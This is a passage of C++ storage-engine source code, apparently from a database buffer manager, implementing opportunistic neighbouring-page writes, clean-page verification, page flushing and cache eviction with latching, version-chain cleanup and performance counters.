// We have failed to flush all BFs ... run back any other BFs ...
Assert( errDiskTilt == errLastFlush );
RevertBFs_( ibf );
}
if ( ibf )
{
// if at least one extra page was flushed, count this as an opportune write IO issued
AtomicIncrement( ( LONG* )&cBFOpportuneWriteIssued );
}
}
}
// true -> clean pages verify, opportune write is a go.
// false -> a clean page corrupted in memory, abort completely.
bool CBFOpportuneWriter::FVerifyCleanBFs_()
{
for ( ULONG ibf = 0; ibf < m_cbfUseful; ++ibf )
{
const PBF pbf = m_rgpbf[ ibf ];
Assert( pbf->sxwl.FOwnExclusiveLatch() );
ERR errPreVerify = pbf->err;
// clean page with a bad checksum
if ( bfdfClean == pbf->bfdf )
{
// for clean pages, we may have a page that has not been derefed in a long time, and therefore
// is paged out on an already dead disk, so to make sure we don't except here, we must "freshen
// the view" properly (deref under an exception handler).
if ( !FOSMemoryPageResident( pbf->pv, CbBFIPageSize( pbf ) ) )
{
// optimization to avoid unnecessarily trading a read for a larger write
return false;
}
if ( pbf->bfat == bfatViewMapped && !FBFICacheViewFresh( pbf ) )
{
// even though we just checked residency, just in case this page was about to be reclaimed
// by OS MM, lock it down with a reference
// Passing 0 for the qosIoPriorities, because this is part of Checkpoint or Scavenge writing
// and has no relation to any client APIs (so there is no User Priority Tag to pass). We
// may however want to use qosIODispatchBackground at some point. But this would only
// affect re-paging in data to write it out - a rare case.
if ( ErrBFICacheViewFreshen( pbf, 0, *TraceContextScope( m_iorBase.Iorp() ) ) < JET_errSuccess )
{
// We could opportunistically take the write latch and update pbf->err, but
// I am going to leave the error path simple for now.
return false;
}
}
const ERR errReVerify = ErrBFIVerifyPage( pbf, CPageValidationLogEvent::LOG_NONE, fFalse );
if ( errPreVerify >= JET_errSuccess && errReVerify == JET_errPageNotInitialized )
{
// We can try and overwrite with the not initialized page, but it happens so
// rarely I would just rather take the safe route and back out of the IO ... but
// don't log an event or assert in this case.
return false;
}
if ( errReVerify != JET_errSuccess )
{
if ( errPreVerify >= JET_errSuccess )
{
UtilReportEvent( eventError,
BUFFER_MANAGER_CATEGORY,
TRANSIENT_IN_MEMORY_CORRUPTION_DETECTED_ID,
0, NULL );
EnforceSz( fFalse, "TransientMemoryCorruption" );
}
else
{
// if it's just a disk corruption that never got verified, that's actually ok.
AssertSz( fFalse, "Unexpected error here, this should have been clean by now as ErrBFIPrepareFlushPage() rejects BFs with errors." );
}
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFVerCleanRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
Assert( FBFIUpdatablePage( pbf ) );
pbf->sxwl.ReleaseExclusiveLatch();
// nullify this entry, later RevertBFs_() will skip it
m_rgpbf[ ibf ] = NULL;
return false;
}
}
}
return true;
}
ERR CBFOpportuneWriter::ErrPrepareBFForOpportuneWrite_( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
ERR err = JET_errSuccess;
Call( ErrCanAddBF_( pbf ) );
Call( ErrBFIPrepareFlushPage( pbf, bfltExclusive, m_iorBase, m_qos, fFalse ) );
// we should not fail here, and even if we did, we couldn't jump to the error clause as
// is because we would orphan a range lock.
const ERR errAddBF = ErrAddBF_( pbf );
AssertTrack( err == JET_errSuccess, OSFormat( "BFPrepOpWriteErr:%d", err ) );
AssertTrack( errAddBF == JET_errSuccess, OSFormat( "BFPrepOpWriteErrAddBf:%d", errAddBF ) );
return err;
HandleError:
return err;
}
void CBFOpportuneWriter::GetFlushableNeighboringBFs_( const IFMP ifmp, const PGNO pgno, const INT iDelta )
{
Assert( 1 == iDelta || -1 == iDelta );
PBF pbf = NULL;
BOOL fMustReleaseLatch = fFalse;
PGNO pgnoOpp = pgno + iDelta;
while ( fTrue )
{
// Determine if the BF is in the cache
BFHash::CLock lock;
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgnoOpp ), &lock );
PGNOPBF pgnopbf;
BFHash::ERR errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
g_bfhash.ReadUnlockKey( &lock );
if ( errHash != BFHash::ERR::errSuccess )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to cache miss on page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not in cache
}
pbf = pgnopbf.pbf;
// Acquire x-latch
if ( ErrBFIAcquireExclusiveLatchForFlush( pbf, fFalse ) < JET_errSuccess )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to un-latcheable page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not ready for IO
}
Assert( pbf->sxwl.FOwnExclusiveLatch() );
fMustReleaseLatch = fTrue;
// Now that we have the x-latch, make sure it hasn't changed and it's still in a valid state
if ( ( pbf->ifmp != ifmp ) || ( pbf->pgno != pgnoOpp ) || // BF switched to a different page.
( ( pbf->bfdf < bfdfDirty ) && ( !pbf->fCurrentVersion || pbf->fOlderVersion ) ) ) // Page got versioned, avoid flushing non-dirty, just in case
// newer versions got flushed and this older version has not
// been removed from the chain yet.
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to current buffer state page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not ready for IO
}
// Determine if the BF is prepared enough for writing
if ( JET_errSuccess != ErrPrepareBFForOpportuneWrite_( pbf ) )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Failed opportune write due to un-preparable page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
break; // not ready for IO
}
OSTrace( JET_tracetagBufferManager, OSFormat( "Opportune write on page=[0x%x:0x%x]", (ULONG)ifmp, pgnoOpp ) );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
fMustReleaseLatch = fFalse;
pgnoOpp += iDelta;
}
if ( fMustReleaseLatch )
{
Assert( pbf != NULL );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
pbf->sxwl.ReleaseExclusiveLatch();
}
// revert all the useless BFs, m_cbfUseful == index of first useless (clean) BF
RevertBFs_( m_cbfUseful );
}
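// Scan summary (derived from the loop above): for a write of pgno P, the two calls in
// PerformOpportuneWrites() below walk P+1, P+2, ... and P-1, P-2, ... respectively, stopping at
// the first neighbor that is not cached, not latchable, or not preparable for flush; trailing
// clean pages that are not followed by a dirty page within m_cbfMaxCleanRun are released again
// by RevertBFs_( m_cbfUseful ).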
void CBFOpportuneWriter::PerformOpportuneWrites( const IFMP ifmp, const PGNO pgno )
{
// perform opportunistic flush of eligible neighboring pages
//
// NOTE: we must disable ownership tracking because it is possible
// that we will try to latch a page that we already have latched
// while trying to flush an eligible neighboring page. *sigh!*
// the only reason it works is because we try-acquire the exclusive
// latch instead of acquiring it and this will work even if we
// already have the shared latch
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
GetFlushableNeighboringBFs_( ifmp, pgno, 1 );
GetFlushableNeighboringBFs_( ifmp, pgno, -1 );
// UNDONE: now we have all the BFs we want to flush latched inside m_rgpbf;
// in future development, we could sort them, combine them into one I/O, etc.
//
// if clean page verification passes, proceed to flush, else abort whole opportune write
if ( FVerifyCleanBFs_() )
{
// note if the disk subsystem is "tilted" this may not flush all BFs, any over disk quota
// BFs will be "reverted".
FlushUsefulBFs_();
}
else
{
RevertBFs_();
}
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
void BFIPerformOpportuneWrites( const IFMP ifmp, const PGNO pgno, IOREASON iorBase, OSFILEQOS qos )
{
const LONG cbPage = g_rgfmp[ifmp].CbPage();
const LONG cbfMax = ( LONG )UlParam( JET_paramMaxCoalesceWriteSize ) / cbPage - 1;
if ( 0 < cbfMax )
{
const LONG cbfMaxCleanRunRaw = ( LONG )UlParam( JET_paramMaxCoalesceWriteGapSize ) / cbPage;
const LONG cbfMaxCleanRun = max( 0, min( cbfMax - 2, cbfMaxCleanRunRaw ) );
// alloca a PBF array of max IO size!!
void* pv = _alloca( sizeof( CBFOpportuneWriter ) + sizeof( PBF ) * cbfMax );
if ( pv )
{
// instantiate CBFOpportuneWriter object and do the job
CBFOpportuneWriter* pPool = new ( pv ) CBFOpportuneWriter( cbfMax, cbfMaxCleanRun, iorBase, qos );
pPool->PerformOpportuneWrites( ifmp, pgno );
// destruct and validate unlatchedness
pPool->~CBFOpportuneWriter();
}
}
}
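// Illustrative sizing example (assumed parameter values, for clarity only): with a 32 KB page,
// JET_paramMaxCoalesceWriteSize of 1 MB gives cbfMax = 1 MB / 32 KB - 1 = 31 neighboring buffers,
// and JET_paramMaxCoalesceWriteGapSize of 128 KB gives a clean-run cap of
// max( 0, min( 31 - 2, 4 ) ) = 4 clean pages between dirty ones.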
// Takes an exclusively latched BF and tries to write it
// The PBF that is passed in should be exclusively latched and PREPARED!
// On errBFIPageFlushed the exclusive latch is lost
ERR ErrBFIFlushExclusiveLatchedAndPreparedBF( __inout const PBF pbf,
__in const IOREASON iorBase,
__in const OSFILEQOS qos,
__in const BOOL fOpportune )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnExclusiveLatch() );
// Set IOREASON
TraceContextScope tcFlush( iorBase.Iorp() );
tcFlush->iorReason.AddFlag( iorBase.Iorf() );
if ( pbf->fSuspiciouslySlowRead )
{
// NOTE: no additional IO reason flag is currently added for suspiciously slow reads here.
}
if ( fOpportune )
{
tcFlush->iorReason.AddFlag( iorfOpportune );
}
if ( FBFIDatabasePage( pbf ) )
{
tcFlush->SetDwEngineObjid( ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP );
}
// schedule this page for async write
err = ErrBFIAsyncWrite( pbf, qos, *tcFlush );
if ( err < JET_errSuccess )
{
// getting force feedback from the disk ...
Assert( errDiskTilt == err );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
}
else
{
// return an error indicating that the page was flushed
err = ErrERRCheck( errBFIPageFlushed );
Assert( pbf->sxwl.FNotOwnExclusiveLatch() );
}
return err;
}
ERR ErrBFIFlushPage( __inout const PBF pbf,
__in const IOREASON iorBase,
__in const OSFILEQOS qos,
__in const BFDirtyFlags bfdfFlushMin,
__in const BOOL fOpportune,
__out_opt BOOL * const pfPermanentErr )
{
ERR err = JET_errSuccess;
if ( pfPermanentErr )
{
*pfPermanentErr = fFalse;
}
const BOOL fUnencumberedPath = ( ( 0 == ( iorBase.Iorf() & iorfForeground ) ) &&
( iorBase.Iorp() == iorpBFCheckpointAdv || iorBase.Iorp() == iorpBFAvailPool || iorBase.Iorp() == iorpBFShrink ) );
Call( ErrBFIAcquireExclusiveLatchForFlush( pbf, fUnencumberedPath ) );
Assert( !pbf->fAbandoned ); // ... or we should have failed the ErrBFIAcquireExclusiveLatchForFlush() call above.
if ( pbf->bfdf < max( bfdfFlushMin, bfdfUntidy ) )
{
// release our latch and leave
pbf->sxwl.ReleaseExclusiveLatch();
}
else
{
// See where this is passed to BFIOpportunisticallyFlushPage() - ErrBFIAcquireExclusiveLatchForFlush() should
// have completed the IO, and cleaned the page for this IORP ... so we should have taken the if-branch above;
// just release the latch and return.
Expected( iorBase.Iorp() != iorpBFImpedingWriteCleanDoubleIo ||
// There is an exception though - a write failure, may mean the page stayed dirty & in err state
// causing us to attempt the double write.
( pbf->bfdf >= bfdfUntidy && pbf->err < JET_errSuccess ) );
// try to remove all dependencies on this BF. if there is an
// issue, release our latch and fail with the error
if( ( err = ErrBFIPrepareFlushPage( pbf, bfltExclusive, iorBase, qos, !fOpportune, pfPermanentErr ) ) < JET_errSuccess )
{
pbf->sxwl.ReleaseExclusiveLatch();
Call( err );
}
Enforce( pbf->pbfTimeDepChainNext == NULL );
#ifdef DEBUG
const INT ibfPage = pbf->icbPage;
#endif
Assert( ( ( qos & qosIOOptimizeCombinable ) == 0 ) || ( iorBase.Iorf() & iorfDependantOrVersion ) );
err = ErrBFIFlushExclusiveLatchedAndPreparedBF( pbf, iorBase, qos, fOpportune );
if ( errBFIPageFlushed == err )
{
if ( !fOpportune )
{
Assert( g_rgfmp[pbf->ifmp].CbPage() == g_rgcbPageSize[ibfPage] );
BFIPerformOpportuneWrites( pbf->ifmp, pbf->pgno, iorBase, OSFILEQOS( qos | qosIOOptimizeCombinable ) );
}
}
else if ( errDiskTilt == err )
{
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFFlushRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
pbf->sxwl.ReleaseExclusiveLatch();
Call( err );
}
else
{
EnforceSz( fFalse, OSFormat( "UnexpectedFlushFailure:%d", err ) ); // not even success is expected
}
}
HandleError:
Assert( pbf->sxwl.FNotOwner() ); // specific risk is exclusive latch ...
return err;
}
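// Outcome note (derived from the code above): for a page that actually needed writing, the
// expected "success" result is the errBFIPageFlushed error code (the async write was issued and
// the exclusive latch was consumed by the IO path); JET_errSuccess is returned when the page was
// already below the requested dirtiness threshold and nothing had to be written.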
bool FBFICompleteFlushPage( _Inout_ PBF pbf, _In_ const BFLatchType bflt, _In_ const BOOL fUnencumberedPath, _In_ const BOOL fCompleteRemapReVerify, _In_ const BOOL fAllowTearDownClean )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
if ( wrnBFPageFlushPending != pbf->err )
{
// we weren't even undergoing IO, so we can't have completed flush page ...
return fFalse;
}
if ( ErrBFIWriteSignalState( pbf ) != wrnBFPageFlushPending )
{
Assert( wrnBFPageFlushPending == pbf->err );
// complete the state transition associated with the write IO ...
BFIFlushComplete( pbf, bflt, fUnencumberedPath, fCompleteRemapReVerify, fAllowTearDownClean );
Assert( wrnBFPageFlushPending != pbf->err );
Assert( FBFIUpdatablePage( pbf ) );
Assert( errBFIPageRemapNotReVerified != pbf->err || !fCompleteRemapReVerify );
// Note: at this point the BF may be in a read IO error state due to remap under ViewCache
}
// even though we dropped the virtual lock by unsetting wrnBFPageFlushPending in the BF::err, we still
// have the x- or w-latch in this code path.
return wrnBFPageFlushPending != pbf->err;
}
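// Contract note (derived from the code above): fTrue is returned only when pbf->err is no longer
// wrnBFPageFlushPending, i.e. either no flush was in flight or the write-signal state showed the
// IO already completed and BFIFlushComplete() finished the state transition; callers such as
// ErrBFIAcquireExclusiveLatchForFlush() and ErrBFIEvictPage() treat fFalse as "flush still pending".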
INLINE BOOL FBFIIsCleanEnoughForEvict( const PBF pbf )
{
return ( pbf->bfdf < bfdfDirty );
}
void BFIFlagDependenciesImpeding( PBF pbf )
{
g_critBFDepend.Enter();
// Note setting this flag in the overscan range makes sense to affect
// write unlatch, but not necessarily exclusive latch when calling
// BFIOpportunisticallyVersionPage(). Hmmm ...
// This is technically a little aggressive ... we could base this off
// lgposModify.
pbf->bfbitfield.SetFImpedingCheckpoint( fTrue );
// Also flag all of its dependents as impeding.
(void)PbfBFIGetFlushOrderLeaf( pbf, fTrue );
g_critBFDepend.Leave();
}
// Removes all clean versions linked to this version.
//
// This chain of clean versions happens when, while a clean page is being written, another
// thread comes in to w-latch / dirty the page, and thus versions the page to
// avoid waiting for IO to complete.
// Note: Can fail due to latch conflicts or dirty buffers.
ERR ErrBFIEvictRemoveCleanVersions( PBF pbf )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
g_critBFDepend.Enter();
PBF pbfLast = pbfNil;
// potential improvement, use a stack or something to avoid O(n^2) resetting
// behavior here. But this is the super safe approach b/c we let go of
// g_critBFDepend at end of loop, and always re-establish from pbf.
while ( ( pbfLast = PbfBFIGetFlushOrderLeaf( pbf, fFalse ) ) &&
pbfLast != pbf &&
FBFIIsCleanEnoughForEvict( pbfLast ) )
{
Assert( pbfLast->pbfTimeDepChainNext == NULL );
// Must only try latch to avoid deadlock.
CSXWLatch::ERR errSXWL = pbfLast->sxwl.ErrTryAcquireExclusiveLatch();
if ( CSXWLatch::ERR::errSuccess == errSXWL )
{
if ( !FBFIUpdatablePage( pbfLast ) )
{
// Unfortunately this clean page is still being written
// and so can not be removed.
pbfLast->sxwl.ReleaseExclusiveLatch();
Error( ErrERRCheck( errBFIRemainingDependencies ) );
}
#ifndef RTM
const PBF pbfPrev = pbfLast->pbfTimeDepChainPrev;
AssertRTL( pbfPrev && pbfPrev->pbfTimeDepChainNext );
#endif
// Remove the (clean) versions.
BFICleanVersion( pbfLast, fFalse );
// We should make sure we are at least making progress ...
AssertRTL( pbfLast->pbfTimeDepChainPrev == NULL );
AssertRTL( pbfPrev && pbfPrev->pbfTimeDepChainNext == NULL );
pbfLast->sxwl.ReleaseExclusiveLatch();
}
else
{
// remember that user threads should not have any access to this older
// version of the buffer, and so we should not be able to endlessly
// deadlock if someone continuously calls this.
Assert( CSXWLatch::ERR::errLatchConflict == errSXWL );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// Give others a chance to visit the great land of dependencies.
g_critBFDepend.Leave();
g_critBFDepend.Enter();
}
if ( pbfLast != pbf || pbf->pbfTimeDepChainNext )
{
// A time dependency remains; probably a non-cleanable pbf is in the chain.
// Note: Today we think this can't happen, as it would require a chain like:
// g_bfhash->clean bf->dirty bf.
Assert( !FBFIIsCleanEnoughForEvict( pbf ) );
Error( ErrERRCheck( errBFIRemainingDependencies ) );
}
HandleError:
g_critBFDepend.Leave();
return err;
}
// This attempts to evict a page from the cache.
ERR ErrBFIEvictPage( PBF pbf, BFLRUK::CLock* plockLRUK, const BFEvictFlags bfefDangerousOptions )
{
ERR err = JET_errSuccess;
BOOL fOwnsHash = fFalse;
BOOL fOwnsLatch = fFalse;
BFEvictFlags bfefTraceOnly = bfefNone;
const BOOL fEvictDirty = ( 0 != ( bfefDangerousOptions & bfefEvictDirty ) );
const BOOL fAllowTearDownClean = ( 0 != ( bfefDangerousOptions & bfefAllowTearDownClean ) );
Assert( bfefDangerousOptions & bfefReasonMask ); // should always have a reason
Expected( ( bfefDangerousOptions & bfefTraceMask ) == 0 );
const INT iEvictReason = ( bfefDangerousOptions & bfefReasonMask );
Assert( iEvictReason ); // all evict reasons are non-zero
Assert( iEvictReason >= bfefReasonMin && iEvictReason < bfefReasonMax );
//
// Eviction Acquire all Needed Locks
//
// write lock this IFMP / PGNO in the hash table to prevent new
// latch attempts on this BF
BFHash::CLock lockHash;
g_bfhash.WriteLockKey( IFMPPGNO( pbf->ifmp, pbf->pgno ), &lockHash );
fOwnsHash = fTrue;
// no one currently owns or is waiting to own the latch on this BF
// (we tell this by trying to acquire the Write Latch)
if ( pbf->sxwl.ErrTryAcquireWriteLatch() != CSXWLatch::ERR::errSuccess )
{
// someone owns or is waiting to own a latch on this BF
// we can not evict this page because of a latch conflict
// if the page is undergoing a read operation (fault pending),
// then return that specifically, or its "hung" version.
// even though we do not have the latch at this point, the latch
// would be released in case of any errors anyways, so the check
// is always subject to timing.
if ( pbf->err == errBFIPageFaultPending )
{
Error( FBFIIsIOHung( pbf ) ? ErrERRCheck( errBFIPageFaultPendingHungIO ) : ErrERRCheck( errBFIPageFaultPending ) );
}
else
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
}
Assert( pbf->sxwl.FOwnWriteLatch() );
fOwnsLatch = fTrue;
AssertTrack( pbf->err != JET_errFileIOBeyondEOF, "BFIEvictPageEof" );
// Normally, we won't loop below, but the loop is necessary because the flush completion
// path releases both the BF hash lock and the page lock, so we need to re-check for pending
// flushes once we re-acquire the locks.
OnDebug( INT cCompleteFlushAttempts = 0 );
while ( !FBFIUpdatablePage( pbf ) )
{
OnDebug( cCompleteFlushAttempts++ );
Expected( cCompleteFlushAttempts <= 10 );
// I think we will have problems if we're actually trying to evict a page undergoing IO.
Assert( !fEvictDirty );
// Need to release the BF hash to complete the flush.
g_bfhash.WriteUnlockKey( &lockHash );
fOwnsHash = fFalse;
// Complete the flush on the spot.
if ( FBFICompleteFlushPage( pbf, bfltWrite, fFalse, fTrue, fAllowTearDownClean ) )
{
Assert( FBFIUpdatablePage( pbf ) );
bfefTraceOnly |= bfefTraceFlushComplete;
pbf->sxwl.ReleaseWriteLatch();
fOwnsLatch = fFalse;
g_bfhash.WriteLockKey( IFMPPGNO( pbf->ifmp, pbf->pgno ), &lockHash );
fOwnsHash = fTrue;
if ( pbf->sxwl.ErrTryAcquireWriteLatch() != CSXWLatch::ERR::errSuccess )
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
fOwnsLatch = fTrue;
}
else
{
// we cannot evict this page because a flush is pending
Error( ErrBFIFlushPendingStatus( pbf ) );
}
}
// Note you can check this outside of g_critBFDepend, because we only add versions at
// the head of the chain, and if we remove a version after we checked, then the called
// function will make the right decision from within g_critBFDepend.
if ( pbf->pbfTimeDepChainNext != NULL )
{
// we want to remove any clean versions below this
(void)ErrBFIEvictRemoveCleanVersions( pbf );
// we do not care about errors, we will then fall to the next if clause and decide if it
// is appropriate to evict something with an older version.
}
// the BF doesn't have a hashed latch
if ( !FBFILatchDemote( pbf ) )
{
Error( ErrERRCheck( errBFLatchConflict ) );
}
// the BF has no older versions (otherwise we pitch this
// out and let flush page clean this up first) and this BF
// is clean / untidy or we are allowed to evict dirty BFs
if ( ( !FBFIIsCleanEnoughForEvict( pbf ) || ( pbf->pbfTimeDepChainNext != NULL ) ) && !fEvictDirty )
{
Error( ErrERRCheck( errBFIPageDirty ) );
}
// we currently have this BF locked in the LRUK
Enforce( pbf->pbfTimeDepChainNext == NULL || fEvictDirty );
PBF pbfLocked;
if ( g_bflruk.ErrGetCurrentResource( plockLRUK, &pbfLocked ) != BFLRUK::ERR::errSuccess )
{
// we currently do not have this BF locked in the LRUK
Error( ErrERRCheck( errBFLatchConflict ) );
}
Enforce( pbf == pbfLocked );
//
// Eviction Point of No Return ... clear the page out
//
// determine if we will save the history for this BF. we only
// want to save history for the current version of a page that
// was actually touched (i.e. validated) and is not being
// purged (inferred via fEvictDirty)
const BOOL fKeepHistory = !fEvictDirty &&
pbf->fCurrentVersion &&
pbf->err != errBFIPageNotVerified &&
!BoolParam( JET_paramEnableViewCache );
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
if ( fKeepHistory )
{
bfefTraceOnly |= bfefKeepHistory;
}
// before we modify these, check ...
Assert( pbf->fCurrentVersion != pbf->fOlderVersion );
// remove this BF from the IFMP / PGNO hash table if it is the
// current version of the page
const BOOL fCurrentVersion = pbf->fCurrentVersion;
if ( pbf->fCurrentVersion )
{
Assert( !( bfefNukePageImage == ( bfefDangerousOptions & bfefNukePageImage ) ) );
pbf->fCurrentVersion = fFalse;
BFHash::ERR errHash = g_bfhash.ErrDeleteEntry( &lockHash );
Assert( errHash == BFHash::ERR::errSuccess );
}
// set up trace eviction flags
if ( pbf->err == errBFIPageNotVerified )
{
bfefTraceOnly |= bfefTraceUntouched;
}
if ( pbf->lrukic.kLrukPool() == 2 )
{
bfefTraceOnly |= bfefTraceK2;
}
if ( pbf->bfrs == bfrsNotResident )
{
bfefTraceOnly |= bfefTraceNonResident;
}
if ( pbf->lrukic.FSuperColded() )
{
bfefTraceOnly |= bfefTraceSuperColded;
}
// trace eviction info before releasing the BF hash because after that happens, the page
// can technically be cached again and a cache trace may be logged prior to the eviction
// trace
Assert( !fCurrentVersion || !pbf->fOlderVersion ); // both can't be set, though sometimes neither is set??
Assert( ( bfefDangerousOptions & bfefTraceOnly ) == 0 ); // super confusing to have overlapping behavior and trace-only flags
BFITraceEvictPage( pbf->ifmp, pbf->pgno, fCurrentVersion, pbf->err, bfefDangerousOptions | bfefTraceOnly );
// release our write lock on this IFMP / PGNO
g_bfhash.WriteUnlockKey( &lockHash );
fOwnsHash = fFalse;
// we are past the point of no return, begin updating statistics / perf counters
// we don't update perf counters when we clean up lingering cached pages
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
const BOOL fCurrentlyAttached = ( pbffmp && pbffmp->fCurrentlyAttached );
if ( fCurrentlyAttached )
{
// evicting pre-read untouched
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheEvictUntouched.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "Evicted untouched preread page=[0x%x:0x%x]", (ULONG)pbf->ifmp, pbf->pgno ) );
}
// evicting regular k=1 or k=2 touched page
#ifndef MINIMAL_FUNCTIONALITY // no perfmon, no point
const ULONG k = pbf->lrukic.kLrukPool();
switch ( k )
{
case 1:
PERFOpt( cBFCacheEvictk1.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
case 2:
PERFOpt( cBFCacheEvictk2.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
default:
AssertSz( fFalse, "k(%d) Touch not 1 or 2, BF confused.", k );
}
#endif
// track if this is an evicted non-resident page
if ( pbf->bfrs == bfrsNotResident )
{
// should we do anything with bfrsNotCommitted or bfrsNewlyCommitted?
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentEvicted ) );
}
// track why we evicted the pages
Assert( iEvictReason >= 0 && iEvictReason < bfefReasonMax );
if ( iEvictReason >= 0 &&
iEvictReason < ( bfefReasonMax ) )
{
PERFOpt( rgcBFCacheEvictReasons[iEvictReason].Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
if ( pbf->lrukic.FSuperColded() )
{
if ( pbf->fOlderVersion )
{
// the only internal reason for super colding is older versioned pages
PERFOpt( cBFCacheEvictScavengeSuperColdInternal.Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
else
{
PERFOpt( cBFCacheEvictScavengeSuperColdUser.Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
}
}
else
{
PERFOpt( g_cbCacheUnattached -= CbBFIBufferSize( pbf ) );
}
pfmp->LeaveBFContextAsReader(); // now we're done with inst references, release IFMP
// remove this BF from the LRUK
BFLRUK::ERR errLRUK = g_bflruk.ErrEvictCurrentResource( plockLRUK, IFMPPGNO( pbf->ifmp, pbf->pgno ), fKeepHistory );
Assert( errLRUK == BFLRUK::ERR::errSuccess );
// remove this BF from the Oldest Begin0 index
//
// NOTE: we usually do this during Idle Flush or Checkpoint
// Advancement. However, we must do this on Evict to enable
// runtime verification of Flush and Purge and to allow us to
// delete our BF FMP Context when an FMP is completely Purged
BFIResetLgposOldestBegin0( pbf );
// force this BF to be clean, purging any dependencies
BFICleanPage( pbf, bfltWrite, fAllowTearDownClean ? bfcfAllowTearDownClean : bfcfNone );
// it should not be part of a dependency chain at this point because we're about to evict it,
// which would make the dependent and dependent-upon buffers point to an evicted buffer.
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
// if this was an older version, decrement versioned pages count
if ( pbf->fOlderVersion )
{
Assert( !fCurrentVersion );
#ifdef DEBUG
PGNOPBF pgnopbf;
BFHash::CLock lock;
g_bfhash.ReadLockKey( IFMPPGNO( pbf->ifmp, pbf->pgno ), &lock );
if ( g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf ) == BFHash::ERR::errSuccess )
{
Assert( pbf != pgnopbf.pbf );
}
g_bfhash.ReadUnlockKey( &lock );
#endif // DEBUG
pbf->fOlderVersion = fFalse;
PERFOpt( AtomicDecrement( (LONG*)&g_cBFVersioned ) );
}
// trace that we have just evicted a page
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManagerBufferCacheState,
OSFormat( "Evicted page=[0x%x:0x%x], tce=%d", (ULONG)pbf->ifmp, pbf->pgno, pbf->tce ) );
// update DBA statistics
//
// we measure cache-pressure by counting the number of Allocs
// where pbf->fNewlyEvicted == fTrue. the idea is that evicting
// is not considered cache pressure; only repurposing something that
// you cared about is considered cache pressure. in a simpler world,
// a page would start as fFalse, get allocated (not considered cache
// pressure i.e. we had a free page), get evicted (fNewlyEvicted = fTrue),
// get reused for something new (fNewlyEvicted = fFalse; but this
// *is* considered cache pressure).
//
// to handle those cases; Evict should do
// pbf->fNewlyEvicted = fTrue;
//
// two operations: BFPurge and MarkAsSuperCold are special in that
// they happen before Evict gets called but want to be treated as if
// the memory is freshly allocated. so instead of using a different
// bit to track that state, we re-use this one.
//
// specifically, we toggle this flag because we want the ability to
// exclude some pages from counting as newly evicted pages
// once they are reused. such pages have this flag set before
// they are evicted while they still contain valid data
//
// thus, if the state was fTrue coming in; that's a coded signal
// that reuse of this page does not mean cache pressure.
pbf->fNewlyEvicted = !pbf->fNewlyEvicted;
#ifdef DEBUG
if ( bfefNukePageImage == ( bfefDangerousOptions & bfefNukePageImage ) )
{
// Kabloowiieee!!!
memset( pbf->pv, 0xFF, CbBFIBufferSize( pbf ) );
}
#endif
// if we are mapping views then release the page buffer
BFICacheIUnmapPage( pbf );
Assert( pbf->bfat == bfatNone || !UlParam( JET_paramEnableViewCache ) );
// free this BF to the avail pool
const BOOL fQuiesce = ( bfefDangerousOptions & bfefQuiesce ) != 0;
Expected( !fQuiesce || ( bfefDangerousOptions & bfefReasonShrink ) );
BFIFreePage( pbf, fFalse, fQuiesce ? bffpfQuiesce : bffpfNone );
fOwnsLatch = fFalse; // BFIFreePage releases ownership ...
Assert( JET_errSuccess == err );
HandleError:
if ( fOwnsHash )
{
// release our write lock on this IFMP / PGNO
g_bfhash.WriteUnlockKey( &lockHash );
fOwnsHash = fFalse;
}
if ( fOwnsLatch )
{
// release our write latch on this BF
pbf->sxwl.ReleaseWriteLatch();
fOwnsLatch = fFalse;
}
return err;
}
